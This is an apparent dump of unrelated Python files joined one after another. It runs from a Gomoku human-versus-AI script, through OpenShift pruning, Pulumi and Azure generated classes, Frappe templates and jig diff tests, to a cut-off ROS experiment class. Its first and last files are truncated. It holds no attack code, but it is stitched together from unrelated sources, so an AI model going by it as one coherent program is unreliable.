        self.player = None

    def set_player_ind(self, p):
        """Record the player index used by the game engine."""
        self.player = p

    def get_action(self, board):
        """Prompt for a move like '3,3' until a valid one is entered.

        BUG FIX: invalid input previously retried via recursion, which can
        exhaust the recursion limit on repeated bad input; a loop is
        equivalent and safe.  The unused exception variable was dropped.
        """
        while True:
            try:
                location = input("Your move: ")
                if isinstance(location, str):
                    location = [int(n, 10) for n in location.split(",")]
                move = board.location_to_move(location)
            except Exception:
                move = -1
            if move != -1 and move in board.available:
                return move
            print("invalid move")

    def __str__(self):
        return "Human {}".format(self.player)


def run(model_name):
    """Play a human-vs-AI game with the named trained model.

    Args:
        model_name: name resolved to a saved policy-value net via
            get_model_path.
    """
    n = N_IN_ROW
    width, height = BOARD_WIDTH, BOARD_HEIGHT
    globalV['MODEL_NAME'] = model_name
    globalV['MODEL_PATH'] = get_model_path(model_name)
    try:
        board = Board(width=width, height=height, n_in_row=n)
        game = Game(board)

        # Create the AI player backed by the trained policy-value network.
        best_policy = PolicyValueNet(width, height, model_file=globalV['MODEL_PATH'])
        mcts_player = MCTSPlayer(best_policy.policy_value_fn, c_puct=5, n_playout=400)

        # Create the human player; moves are entered like: 2,3
        human = Human()

        # Set start_player=0 to let the human move first.
        game.start_play(human, mcts_player, start_player=1, is_shown=1)
    except KeyboardInterrupt:
        print('\n\rquit')
python
import json
import urllib2
import uuid
import random
import string


# send api call, must have NXT server running
# NOTE(review): urllib2 means this is Python 2 code.  `typ` is passed as the
# POST body to urlopen (presumably an urlencoded requestType=... string --
# verify against callers).  uuid/random/string are imported but unused here.
def nxtapi(typ):
    # urlopen(url, data) issues a POST; the JSON response is parsed directly
    # from the open file-like response object.
    return json.load(urllib2.urlopen('http://jnxt.org:7876/nxt', typ));
python
# ************************************************
# (c) 2019-2021 Nurul-GC.                        *
# - BSD 3-Clause License                         *
# ************************************************
from secrets import token_bytes
from typing import Tuple


def encrypt(text: str) -> Tuple[int, int]:
    """One-time-pad encrypt *text* into a pair of big integers.

    The plaintext bytes are XOR-ed with a random pad of ``len(text)``
    bytes; XOR-ing the two returned numbers recovers the original bytes.

    :param text: the text to be encrypted
    :return: ``(ciphertext, pad)`` as integers
    """
    pad_bytes = token_bytes(len(text))
    pad = int.from_bytes(pad_bytes, 'big')
    plaintext = int.from_bytes(text.encode(), 'big')
    return plaintext ^ pad, pad
python
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = [ 'MembersMemberArgs', 'PoolPersistenceArgs', ] @pulumi.input_type class MembersMemberArgs: def __init__(__self__, *, address: pulumi.Input[str], protocol_port: pulumi.Input[int], admin_state_up: Optional[pulumi.Input[bool]] = None, backup: Optional[pulumi.Input[bool]] = None, id: Optional[pulumi.Input[str]] = None, name: Optional[pulumi.Input[str]] = None, subnet_id: Optional[pulumi.Input[str]] = None, weight: Optional[pulumi.Input[int]] = None): """ :param pulumi.Input[str] address: The IP address of the members to receive traffic from the load balancer. :param pulumi.Input[int] protocol_port: The port on which to listen for client traffic. :param pulumi.Input[bool] admin_state_up: The administrative state of the member. A valid value is true (UP) or false (DOWN). Defaults to true. :param pulumi.Input[bool] backup: A bool that indicates whether the the member is backup. **Requires octavia minor version 2.1 or later**. :param pulumi.Input[str] id: The unique ID for the members. :param pulumi.Input[str] name: Human-readable name for the member. :param pulumi.Input[str] subnet_id: The subnet in which to access the member. :param pulumi.Input[int] weight: A positive integer value that indicates the relative portion of traffic that this members should receive from the pool. For example, a member with a weight of 10 receives five times as much traffic as a member with a weight of 2. Defaults to 1. 
""" pulumi.set(__self__, "address", address) pulumi.set(__self__, "protocol_port", protocol_port) if admin_state_up is not None: pulumi.set(__self__, "admin_state_up", admin_state_up) if backup is not None: pulumi.set(__self__, "backup", backup) if id is not None: pulumi.set(__self__, "id", id) if name is not None: pulumi.set(__self__, "name", name) if subnet_id is not None: pulumi.set(__self__, "subnet_id", subnet_id) if weight is not None: pulumi.set(__self__, "weight", weight) @property @pulumi.getter def address(self) -> pulumi.Input[str]: """ The IP address of the members to receive traffic from the load balancer. """ return pulumi.get(self, "address") @address.setter def address(self, value: pulumi.Input[str]): pulumi.set(self, "address", value) @property @pulumi.getter(name="protocolPort") def protocol_port(self) -> pulumi.Input[int]: """ The port on which to listen for client traffic. """ return pulumi.get(self, "protocol_port") @protocol_port.setter def protocol_port(self, value: pulumi.Input[int]): pulumi.set(self, "protocol_port", value) @property @pulumi.getter(name="adminStateUp") def admin_state_up(self) -> Optional[pulumi.Input[bool]]: """ The administrative state of the member. A valid value is true (UP) or false (DOWN). Defaults to true. """ return pulumi.get(self, "admin_state_up") @admin_state_up.setter def admin_state_up(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "admin_state_up", value) @property @pulumi.getter def backup(self) -> Optional[pulumi.Input[bool]]: """ A bool that indicates whether the the member is backup. **Requires octavia minor version 2.1 or later**. """ return pulumi.get(self, "backup") @backup.setter def backup(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "backup", value) @property @pulumi.getter def id(self) -> Optional[pulumi.Input[str]]: """ The unique ID for the members. 
""" return pulumi.get(self, "id") @id.setter def id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "id", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ Human-readable name for the member. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="subnetId") def subnet_id(self) -> Optional[pulumi.Input[str]]: """ The subnet in which to access the member. """ return pulumi.get(self, "subnet_id") @subnet_id.setter def subnet_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "subnet_id", value) @property @pulumi.getter def weight(self) -> Optional[pulumi.Input[int]]: """ A positive integer value that indicates the relative portion of traffic that this members should receive from the pool. For example, a member with a weight of 10 receives five times as much traffic as a member with a weight of 2. Defaults to 1. """ return pulumi.get(self, "weight") @weight.setter def weight(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "weight", value) @pulumi.input_type class PoolPersistenceArgs: def __init__(__self__, *, type: pulumi.Input[str], cookie_name: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[str] type: The type of persistence mode. The current specification supports SOURCE_IP, HTTP_COOKIE, and APP_COOKIE. :param pulumi.Input[str] cookie_name: The name of the cookie if persistence mode is set appropriately. Required if `type = APP_COOKIE`. """ pulumi.set(__self__, "type", type) if cookie_name is not None: pulumi.set(__self__, "cookie_name", cookie_name) @property @pulumi.getter def type(self) -> pulumi.Input[str]: """ The type of persistence mode. The current specification supports SOURCE_IP, HTTP_COOKIE, and APP_COOKIE. 
""" return pulumi.get(self, "type") @type.setter def type(self, value: pulumi.Input[str]): pulumi.set(self, "type", value) @property @pulumi.getter(name="cookieName") def cookie_name(self) -> Optional[pulumi.Input[str]]: """ The name of the cookie if persistence mode is set appropriately. Required if `type = APP_COOKIE`. """ return pulumi.get(self, "cookie_name") @cookie_name.setter def cookie_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "cookie_name", value)
python
# Minimal smoke-test script for a MiPow Playbulb BLE smart bulb:
# connect to the bulb at a hard-coded MAC address, switch it off,
# and release the connection.
import mipow

bulb = mipow.mipow("70:44:4B:14:AC:E6")  # BLE MAC address of the target bulb
bulb.connect()
bulb.off()  # turn the light off
bulb.disconnect()  # always release the BLE handle when done
python
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------

from enum import Enum, EnumMeta
from six import with_metaclass


# Metaclass that makes both item access (Enum['name']) and attribute access
# (Enum.name) case-insensitive by upper-casing the lookup key.
class _CaseInsensitiveEnumMeta(EnumMeta):
    def __getitem__(self, name):
        return super().__getitem__(name.upper())

    def __getattr__(cls, name):
        """Return the enum member matching `name`
        We use __getattr__ instead of descriptors or inserting into the enum class'
        __dict__ in order to support `name` and `value` being both properties for enum members
        (which live in the class' __dict__) and enum members themselves.
        """
        try:
            return cls._member_map_[name.upper()]
        except KeyError:
            # Mirror normal attribute-lookup failure semantics.
            raise AttributeError(name)


class DeploymentState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Deployment state.
    """

    #: The deployment can be sent to devices targeted in the deployment.
    ACTIVE = "Active"
    #: A newer deployment with the same targeting exists and no devices will receive this deployment.
    SUPERSEDED = "Superseded"
    #: The deployment has been canceled and no devices will receive it.
    CANCELED = "Canceled"


class DeploymentType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Supported deployment types.
    """

    #: A complete deployment including download, install, and apply actions.
    COMPLETE = "Complete"
    #: A download-only deployment that does not include any install or apply actions. Not currently
    #: supported.
    DOWNLOAD = "Download"
    #: An install-only rollout that does not include any download actions, only install and complete.
    #: Not currently supported.
    INSTALL = "Install"


class DeviceDeploymentState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Deployment state.
    """

    #: Deployment has completed with success.
    SUCCEEDED = "Succeeded"
    #: Deployment is in progress.
    IN_PROGRESS = "InProgress"
    #: Deployment has completed with failure.
    FAILED = "Failed"
    #: Deployment was canceled.
    CANCELED = "Canceled"
    #: Deployment is not compatible with the device.
    INCOMPATIBLE = "Incompatible"


class DeviceGroupType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Supported deployment group types.
    """

    #: The deployment should be sent to all devices in the device class.
    ALL = "All"
    #: The deployment should be sent to the list of devices in the device group definition.
    DEVICES = "Devices"
    #: The deployment should be sent to the list of devices returned by the union of all the device
    #: group definition queries.
    DEVICE_GROUP_DEFINITIONS = "DeviceGroupDefinitions"


class DeviceState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """The deployment device state.
    """

    #: Not started (or uninitialized).
    NOT_STARTED = "NotStarted"
    #: Deployment incompatible for this device.
    INCOMPATIBLE = "Incompatible"
    #: Another Deployment is underway for this device.
    ALREADY_IN_DEPLOYMENT = "AlreadyInDeployment"
    #: Deployment has been canceled for this device.
    CANCELED = "Canceled"
    #: Deployment underway.
    IN_PROGRESS = "InProgress"
    #: Deployment failed.
    FAILED = "Failed"
    #: Deployment completed successfully.
    SUCCEEDED = "Succeeded"


class GroupType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Supported group types.
    """

    #: IoT Hub tag based group.
    IO_T_HUB_TAG = "IoTHubTag"


class OperationFilterStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Operation status filter.
    """

    RUNNING = "Running"
    NOT_STARTED = "NotStarted"


class OperationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Operation status.
    """

    #: Undefined operation status.
    UNDEFINED = "Undefined"
    #: Background operation created but not started yet.
    NOT_STARTED = "NotStarted"
    #: Background operation is currently running.
    RUNNING = "Running"
    #: Background operation finished with success.
    SUCCEEDED = "Succeeded"
    #: Background operation finished with failure.
    FAILED = "Failed"
python
#!/usr/bin/env python
# vim: expandtab:tabstop=4:shiftwidth=4
''' Prune images/builds/deployments '''
#
# Copyright 2016 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Disabling invalid-name because pylint doesn't like the naming
# convention we have.
# pylint: disable=invalid-name
#
# NOTE: this is a Python 2 script (statement-form `print` throughout).

import argparse
import base64
import json
import os
import subprocess

# Namespace and name of the service account used for pruning.
SERVICE_ACCOUNT_GROUP = "openshift-infra"
SERVICE_ACCOUNT = "autopruner"
# Kube manifest used to create the service account when it is missing.
SERVICE_ACCOUNT_TEMPLATE = {"apiVersion": "v1",
                            "kind": "ServiceAccount",
                            "metadata": {"name": SERVICE_ACCOUNT}
                           }


class OpenShiftPrune(object):
    ''' Class to handle pruning of old objects '''

    def __init__(self):
        # parse_args() populates self.args immediately on construction.
        self.args = None
        self.parse_args()

    def parse_args(self):
        '''Parse the arguments for this script'''
        parser = argparse.ArgumentParser(description="OpenShift object pruner")
        parser.add_argument('-d', '--debug', default=False, action="store_true",
                            help="debug mode")
        # NOTE: the keep/age values are kept as strings because they are passed
        # straight through to the `oadm prune` command line.
        parser.add_argument('--image-keep-younger-than', default='24h',
                            help='Ignore images younger than set time')
        parser.add_argument('--image-keep-tag-revisions', default='5',
                            help='Number of image revisions to keep')
        parser.add_argument('--build-keep-younger-than', default='1h',
                            help='Ignore builds younger than set time')
        parser.add_argument('--build-keep-complete', default='2',
                            help='Number of builds to keep')
        parser.add_argument('--build-keep-failed', default='1',
                            help='Number of failed builds to keep')
        parser.add_argument('--deploy-keep-younger-than', default='1h',
                            help='Ignore deployments younger than set time')
        parser.add_argument('--deploy-keep-complete', default='2',
                            help='Number of deployements to keep')
        parser.add_argument('--deploy-keep-failed', default='1',
                            help='Number of failed deployments to keep')
        parser.add_argument('--kube-config', default='/tmp/admin.kubeconfig',
                            help='Kubeconfig creds to use')
        self.args = parser.parse_args()

    def ensure_autopruner_exists(self):
        ''' create autopruning account/perms if it doesn't exist '''
        # user exists?
        cmd = ['oc', 'get', 'serviceaccount', SERVICE_ACCOUNT,
               '-n', SERVICE_ACCOUNT_GROUP,
               '--config', self.args.kube_config]
        rc = subprocess.call(cmd)
        if rc != 0:
            # create service account
            if self.args.debug:
                print "Service account not found. Creating."
            # Feed the JSON manifest to `oc create -f -` through a pipe so we
            # never have to write a temp file.
            read, write = os.pipe()
            sa_template = json.dumps(SERVICE_ACCOUNT_TEMPLATE)
            os.write(write, sa_template)
            os.close(write)
            cmd = ['oc', 'create', '-n', SERVICE_ACCOUNT_GROUP,
                   '-f', '-', '--config', self.args.kube_config]
            try:
                subprocess.check_call(cmd, stdin=read)
            except subprocess.CalledProcessError:
                print "Error creating service account"
                raise
        # check if autoprune user has pruning perms
        username = "system:serviceaccount:{}:{}".format(SERVICE_ACCOUNT_GROUP,
                                                        SERVICE_ACCOUNT)
        cmd = ['oc', 'get', 'clusterrolebindings', 'system:image-pruner',
               '-o', 'json', '--config', self.args.kube_config]
        rc = 0
        try:
            output = json.loads(subprocess.check_output(cmd))
        except subprocess.CalledProcessError as e:
            rc = e.returncode
        # NOTE(review): if the `oc get` above fails, `output` is unbound here;
        # the short-circuit on rc != 0 is what keeps this from raising.
        if rc != 0 or username not in output['userNames']:
            # grant image pruning
            if self.args.debug:
                print "Granding image pruning perms"
            cmd = ['oadm', 'policy', 'add-cluster-role-to-user',
                   'system:image-pruner', username,
                   '--config', self.args.kube_config]
            try:
                subprocess.check_call(cmd)
            except subprocess.CalledProcessError:
                print "Error granting image pruning perms"
                raise

    def get_autopruner_token(self):
        ''' fetch and return the token for the autopruning account '''
        token = None
        self.ensure_autopruner_exists()
        # get token
        cmd = ['oc', 'get', 'serviceaccounts', SERVICE_ACCOUNT,
               '-n', SERVICE_ACCOUNT_GROUP, '-o', 'json',
               '--config', self.args.kube_config]
        output = json.loads(subprocess.check_output(cmd))
        secretname = None
        # Find the secret holding the service-account token; the name is
        # prefixed "<account>-token".
        for secret in output['secrets']:
            if secret['name'].startswith(SERVICE_ACCOUNT + '-token'):
                secretname = secret['name']
        if secretname == None:
            raise Exception("No secret with token info found.")
        cmd = ['oc', 'get', 'secrets', secretname,
               '-n', SERVICE_ACCOUNT_GROUP, '-o', 'json',
               '--config', self.args.kube_config]
        output = json.loads(subprocess.check_output(cmd))
        # Secret data is base64-encoded in the API response.
        token = base64.standard_b64decode(output['data']['token'])
        return token

    def prune_images(self):
        ''' call oadm to prune images '''
        # Image pruning needs the pruner account's bearer token.
        token = self.get_autopruner_token()
        cmd = ['oadm', 'prune', 'images',
               '--keep-younger-than', self.args.image_keep_younger_than,
               '--keep-tag-revisions', self.args.image_keep_tag_revisions,
               '--config', self.args.kube_config,
               '--token', token,
               '--confirm']
        output = subprocess.check_output(cmd)
        if self.args.debug:
            print "Prune images output:\n" + output

    def prune_builds(self):
        ''' call oadm to prune builds '''
        cmd = ['oadm', 'prune', 'builds',
               '--keep-complete', self.args.build_keep_complete,
               '--keep-younger-than', self.args.build_keep_younger_than,
               '--keep-failed', self.args.build_keep_failed,
               '--config', self.args.kube_config,
               '--confirm']
        output = subprocess.check_output(cmd)
        if self.args.debug:
            print "Prune build output:\n" + output

    def prune_deployments(self):
        ''' call oadm to prune deployments '''
        cmd = ['oadm', 'prune', 'deployments',
               '--keep-complete', self.args.deploy_keep_complete,
               '--keep-younger-than', self.args.deploy_keep_younger_than,
               '--keep-failed', self.args.deploy_keep_failed,
               '--config', self.args.kube_config,
               '--confirm']
        output = subprocess.check_output(cmd)
        if self.args.debug:
            print "Prune deployment output:\n" + output

    def main(self):
        ''' Prune images/builds/deployments '''
        # Each pruning step is attempted independently; the last failure's
        # return code wins, and any failure raises at the end.
        rc = 0
        try:
            self.prune_deployments()
        except subprocess.CalledProcessError as e:
            print "Error pruning deployments"
            rc = e.returncode
        try:
            self.prune_builds()
        except subprocess.CalledProcessError as e:
            print "Error pruning builds"
            rc = e.returncode
        try:
            self.prune_images()
        except subprocess.CalledProcessError as e:
            print "Error pruning images"
            rc = e.returncode
        if rc != 0:
            raise Exception("Error during pruning")


if __name__ == '__main__':
    OSPruner = OpenShiftPrune()
    OSPruner.main()
python
from django.apps import AppConfig


class BlastNew(AppConfig):
    """Django application configuration for the ``blast_new`` app."""

    # Dotted path of the application package (referenced in INSTALLED_APPS).
    name = 'blast_new'
python
# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors # MIT License. See license.txt # For license information, please see license.txt from __future__ import unicode_literals import frappe import frappe.utils import os from frappe import _ from frappe.website.doctype.website_route.website_route import add_to_sitemap, update_sitemap, cleanup_sitemap from frappe.utils.nestedset import rebuild_tree from frappe.model.document import Document class WebsiteTemplate(Document): def after_insert(self): if self.page_or_generator == "Page": website_route = frappe.db.get_value("Website Route", {"website_template": self.name, "page_or_generator": "Page"}) opts = self.as_dict() opts.update({"public_read": 1}) if website_route: update_sitemap(website_route, opts) else: add_to_sitemap(opts) else: condition = "" if self.condition_field: condition = " where ifnull(%s, 0)=1" % self.condition_field for name in frappe.db.sql_list("""select name from `tab{doctype}` {condition} order by idx asc, {sort_field} {sort_order}""".format( doctype = self.ref_doctype, condition = condition, sort_field = getattr(self, "sort_field", "name"), sort_order = getattr(self, "sort_order", "asc") )): doc = frappe.get_doc(self.ref_doctype, name) # regenerate route doc.run_method("on_update") def rebuild_website_template(): # TODO frappe.flags.in_rebuild_config = True frappe.db.sql("""delete from `tabWebsite Template`""") for app in frappe.get_installed_apps(): if app=="webnotes": app="frappe" build_website_template(app) cleanup_sitemap() frappe.flags.in_rebuild_config = False # enable nested set and rebuild rebuild_tree("Website Route", "parent_website_route") frappe.db.commit() def build_website_template(app): config = {"pages": {}, "generators":{}} pages, generators = get_pages_and_generators(app) for args in pages: add_website_template(**args) for args in generators: add_website_template(**args) frappe.db.commit() def get_pages_and_generators(app): pages = [] generators = [] app_path = 
frappe.get_app_path(app) for config_type in ("pages", "generators"): path = os.path.join(app_path, "templates", config_type) if os.path.exists(path): for fname in os.listdir(path): fname = frappe.utils.cstr(fname) if fname.split(".")[-1] in ("html", "xml", "js", "css"): if config_type=="pages": pages.append({"page_or_generator": "Page", "app": app, "path": path, "fname":fname, "app_path":app_path}) else: generators.append({"page_or_generator": "Generator", "app": app, "path": path, "fname":fname, "app_path":app_path}) return pages, generators def add_website_template(page_or_generator, app, path, fname, app_path): name = fname[:-5] if fname.endswith(".html") else fname wsc = frappe._dict({ "doctype": "Website Template", "page_or_generator": page_or_generator, "link_name": name, "template_path": os.path.relpath(os.path.join(path, fname), app_path), }) wsc.controller = get_template_controller(app, path, fname) if wsc.controller: # verbose print wsc.controller module = frappe.get_module(wsc.controller) wsc.no_cache = getattr(module, "no_cache", 0) wsc.no_sitemap = wsc.no_cache or getattr(module, "no_sitemap", 0) wsc.no_sidebar = wsc.no_sidebar or getattr(module, "no_sidebar", 0) wsc.ref_doctype = getattr(module, "doctype", None) wsc.page_name_field = getattr(module, "page_name_field", "page_name") wsc.condition_field = getattr(module, "condition_field", None) wsc.sort_by = getattr(module, "sort_by", "name") wsc.sort_order = getattr(module, "sort_order", "asc") wsc.base_template_path = getattr(module, "base_template_path", None) wsc.page_title = getattr(module, "page_title", _(name.title())) if frappe.db.exists("Website Template", wsc.link_name): # found by earlier app, override frappe.db.sql("""delete from `tabWebsite Template` where name=%s""", (wsc.link_name,)) frappe.get_doc(wsc).insert() return name def get_template_controller(app, path, fname): controller = None controller_name = fname.split(".")[0].replace("-", "_") + ".py" controller_path = os.path.join(path, 
controller_name) if os.path.exists(controller_path): controller = app + "." + os.path.relpath(controller_path[:-3], frappe.get_app_path(app)).replace(os.path.sep, ".") return controller
python
# Processing.py sketch: three overlapping grey circles on a black canvas.
size(960, 240)   # 960x240 px window
background(0)    # black background
fill(205)        # light grey
ellipse(264, 164, 400, 400)
fill(150)        # mid grey
ellipse(456, -32, 400, 400)   # centred above the canvas; only the lower part shows
fill(49)         # dark grey
ellipse(532, 236, 400, 400)
python
from os import symlink from os.path import join, realpath from functools import wraps from textwrap import dedent from pprint import PrettyPrinter from operator import itemgetter from mock import Mock from git import Repo from jig.tests.testcase import JigTestCase from jig.diffconvert import describe_diff, DiffType, GitDiffIndex from jig.tools import cwd_bounce def assertDiff(func): """ Decorator used to test diffs. Uses ``yield`` in the following way: @assertDiff def test_my_diff(self): yield 'one' yield 'two' yield [(1, '-', 'one'), (1, '+', 'two')] The order of the yields are: 1. Original value (a) 2. After it's edited (b) 3. The expected difference """ pp = PrettyPrinter().pformat @wraps(func) def wrapper(self, **kwargs): queue = func(self, **kwargs) a = next(queue) b = next(queue) expected = next(queue) a = dedent(a).strip() b = dedent(b).strip() actual = [i for i in describe_diff(a, b)] if not expected == actual: # pragma: no cover self.fail('Diff does not match:\nexpected\n{}\nactual\n{}'.format( pp(expected), pp(actual))) return wrapper class TestDescribeDiff(JigTestCase): """ Test our diff description method. """ @assertDiff def test_all_addition(self): """ All lines are being added. """ yield '' yield ''' one two three''' yield [ (1, '+', 'one'), (2, '+', 'two'), (3, '+', 'three')] @assertDiff def test_add_blank_lines(self): """ Lines added are just blank lines. """ yield ''' one two three''' yield ''' one two three''' # This is a bit counter-intuitive, but correct yield [ (1, ' ', 'one'), (2, '+', ''), (3, '+', ''), (4, ' ', 'two'), (5, ' ', 'three')] @assertDiff def test_all_same(self): """ No changes. """ yield ''' one two three''' yield ''' one two three''' yield [ (1, ' ', 'one'), (2, ' ', 'two'), (3, ' ', 'three')] @assertDiff def test_one_insert(self): """ Just one line inserted. 
""" yield ''' one two three''' yield ''' one two 2.5 three''' yield [ (1, ' ', 'one'), (2, ' ', 'two'), (3, '+', '2.5'), (4, ' ', 'three')] @assertDiff def test_one_delete(self): """ Just one deleted. """ yield ''' one two three four''' yield ''' one two four''' yield [ (1, ' ', 'one'), (2, ' ', 'two'), (3, '-', 'three'), (3, ' ', 'four')] @assertDiff def test_one_insert_delete(self): """ One insert, one delete. """ yield ''' one two three four''' yield ''' one two 3 four''' yield [ (1, ' ', 'one'), (2, ' ', 'two'), (3, '-', 'three'), (3, '+', '3'), (4, ' ', 'four')] @assertDiff def test_one_character_change(self): """ A single character changed. """ yield ''' one two three four''' yield ''' one two thr3e four''' yield [ (1, ' ', 'one'), (2, ' ', 'two'), (3, '-', 'three'), (3, '+', 'thr3e'), (4, ' ', 'four')] @assertDiff def test_complex_01(self): """ Complex example with several changes. """ yield ''' one two three three-and-a-smidge four''' yield ''' one 1.5 two three four''' yield [ (1, ' ', 'one'), (2, '+', '1.5'), (3, ' ', 'two'), (4, ' ', 'three'), (4, '-', 'three-and-a-smidge'), (5, '+', ''), (6, ' ', 'four')] class TestDiffType(JigTestCase): """ Detect diff type from :py:class:`Git.Diff` objects. """ def test_add(self): """ Add type. """ diff = Mock() diff.new_file = True self.assertEqual(DiffType.A, DiffType.for_diff(diff)) def test_deleted(self): """ Deleted type. """ diff = Mock() diff.new_file = False diff.deleted_file = True self.assertEqual(DiffType.D, DiffType.for_diff(diff)) def test_renamed(self): """ Renamed type. """ diff = Mock() diff.new_file = False diff.deleted_file = False diff.renamed = True self.assertEqual(DiffType.R, DiffType.for_diff(diff)) def test_modified(self): """ Modified type. """ diff = Mock() diff.new_file = False diff.deleted_file = False diff.renamed = False diff.a_blob = 'blob a' diff.b_blob = 'blob b' self.assertEqual(DiffType.M, DiffType.for_diff(diff)) def test_unknown(self): """ Unknown type. 
""" diff = Mock() diff.new_file = False diff.deleted_file = False diff.renamed = False diff.a_blob = False diff.b_blob = False self.assertEqual(DiffType.U, DiffType.for_diff(diff)) class TestGitDiffIndex(JigTestCase): """ Test converting Git changes to JSON. """ def setUp(self): super(TestGitDiffIndex, self).setUp() repo, working_dir, diffs = self.repo_from_fixture('repo01') self.testrepo = repo self.testrepodir = working_dir self.testdiffs = diffs def test_new_file(self): """ Handles new files. """ gdi = self.git_diff_index(self.testrepo, self.testdiffs[0]) self.assertEqual(1, len(list(gdi.files()))) file1 = next(gdi.files()) # This one is relative to the Git repo self.assertEqual('argument.txt', file1['name']) # It should be added because this is a new file self.assertEqual('added', file1['type']) # This one is the full path to the file self.assertEqual( realpath(join(self.testrepodir, 'argument.txt')), realpath(file1['filename'])) def test_modified(self): """ Handles modified files. """ gdi = self.git_diff_index(self.testrepo, self.testdiffs[1]) self.assertEqual(1, len(list(gdi.files()))) file1 = next(gdi.files()) diff = [i for i in file1['diff']] difftypes = set([i[1] for i in diff]) # File was changed self.assertEqual('modified', file1['type']) # We should have every kind of modification # Same lines, additions, and subtractions self.assertEqual( set([' ', '+', '-']), difftypes) # And we have a list of differences as expected self.assertEqual(47, len(diff)) def test_deleted_file(self): """ Handles deleted files. """ gdi = self.git_diff_index(self.testrepo, self.testdiffs[2]) self.assertEqual(1, len(list(gdi.files()))) file1 = next(gdi.files()) diff = [i for i in file1['diff']] difftypes = set([i[1] for i in diff]) # File was deleted self.assertEqual('deleted', file1['type']) # Each line should be a removal self.assertEqual( set(['-']), difftypes) self.assertEqual(35, len(diff)) def test_multiple_changes(self): """ Handles multiple files changed. 
""" gdi = self.git_diff_index(self.testrepo, self.testdiffs[3]) self.assertEqual(2, len(list(gdi.files()))) files = sorted( [i for i in gdi.files()], key=itemgetter('name')) self.assertEqual( 'famous-deaths.txt', files[0]['name']) self.assertEqual( 'italian-lesson.txt', files[1]['name']) def test_name_contains_subdirectories(self): """ If sub-directories are involved, those are included properly. """ gdi = self.git_diff_index(self.testrepo, self.testdiffs[4]) # Since we've moved the file Git will see this as a deletion of 2 files # plus the addition of 2 files, so it makes our count 4. self.assertEqual(4, len(list(gdi.files()))) files = sorted( [i for i in gdi.files()], key=itemgetter('name')) # Make sure that the name contains our sub-directory. self.assertEqual( 'scripts/famous-deaths.txt', files[2]['name']) self.assertEqual( 'scripts/italian-lesson.txt', files[3]['name']) def test_binary_diff(self): """ Binary files are ignored. """ gdi = self.git_diff_index(self.testrepo, self.testdiffs[5]) # We should see our file self.assertEqual(1, len(list(gdi.files()))) # But we don't include the diff since it's binary data self.assertEqual([], gdi.files().next()['diff']) def test_ignores_jig_directory(self): """ Does not include anything in the .jig directory. """ gdi = self.git_diff_index(self.testrepo, self.testdiffs[6]) # We should see our file self.assertEqual(0, len(list(gdi.files()))) def test_symlinks(self): """ Symlinks are ignored because they are not real files. """ self.commit(self.gitrepodir, 'text/a.txt', 'a') self.commit(self.gitrepodir, 'text/b.txt', 'b') self.commit(self.gitrepodir, 'text/c.txt', 'c') # Create the symlink that should be ignored by GitDiffIndex with cwd_bounce(self.gitrepodir): symlink('text', 'also_text') # We have to do this without our testcase since it's a special # situation. 
repo = Repo(self.gitrepodir) repo.git.add('also_text') # The symlink is staged, time to convert the diff gdi = GitDiffIndex(self.gitrepodir, repo.head.commit.diff()) # If we ignored the symlink, which we should, there should be no files self.assertEqual(0, len(list(gdi.files())))
python
import rospy
import subprocess

from gazebo_msgs.srv import DeleteModel
from gazebo_msgs.srv import SetModelConfiguration
from gazebo_msgs.srv import SpawnModel
from std_srvs.srv import Empty as EmptySrv
from std_srvs.srv import EmptyResponse as EmptySrvResponse


class Experiment(object):
    '''
    Spawn objects
    Clean objects
    '''

    # This defines the default robot for simulating a UR5 in a particular
    # environment
    model_name = "robot"
    joint_names = ["shoulder_pan_joint", "shoulder_lift_joint",
                   "elbow_joint", "wrist_1_joint", "wrist_2_joint",
                   "wrist_3_joint"]
    # Home pose (radians) the arm is driven back to on every reset.
    joint_positions = [0.30, -1.33, -1.80, -0.27, 1.50, 1.60]

    def __init__(self, *args, **kwargs):
        pass

    def reset(self):
        # Subclasses must implement the scenario-specific reset.
        raise NotImplementedError('Experiment not defined')


def GetExperiment(experiment, *args, **kwargs):
    # Factory: map experiment name -> Experiment subclass; extra args are
    # forwarded to the subclass constructor. Raises KeyError on unknown name.
    return {
        "magnetic_assembly": MagneticAssemblyExperiment,
        "stack": StackExperiment,
        "navigation" : NavigationExperiment
    }[experiment](*args, **kwargs)


class MagneticAssemblyExperiment(Experiment):
    ''' Magnetic assembly sim launches different blocks '''

    def __init__(self, case):
        # `case` selects the experiment variant passed to roslaunch below.
        self.case = case
